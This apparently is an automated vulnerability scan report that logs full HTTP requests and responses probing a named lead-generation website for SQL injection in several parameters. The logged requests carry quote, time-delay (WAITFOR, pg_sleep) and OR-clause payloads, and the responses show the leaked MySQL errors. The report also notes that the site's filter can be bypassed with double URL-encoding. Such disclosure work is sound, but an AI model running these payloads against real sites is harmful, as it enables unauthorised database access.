OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:11 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Yes - higher deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3''&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:16:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_492_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_492_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3'&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:48 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=iac47eta9cjbjnmorur6ig6tf4; path=/ Content-Length: 7318 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3''&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:48 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=2ct51nqi81700t5ijk7luooom3; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The attributeId_493_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_493_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3'&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:19:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Yes - higher deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3''&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:19:17 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The attributeId_493_t parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_493_t parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3'&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:20 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7238 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
The attributeId_493_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_493_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3%2527&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:52 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=r1im4ivljun42mhd8bd1cd0un3; path=/ Content-Length: 7334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3%2527%2527&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:54 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=b0dk6472bc7sngo2eulma4hrl5; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The attributeId_514_t parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_514_t parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3'&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7238 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
The attributeId_514_t parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_514_t parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3'&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:20:46 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7094 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Yes - higher deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3''&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; 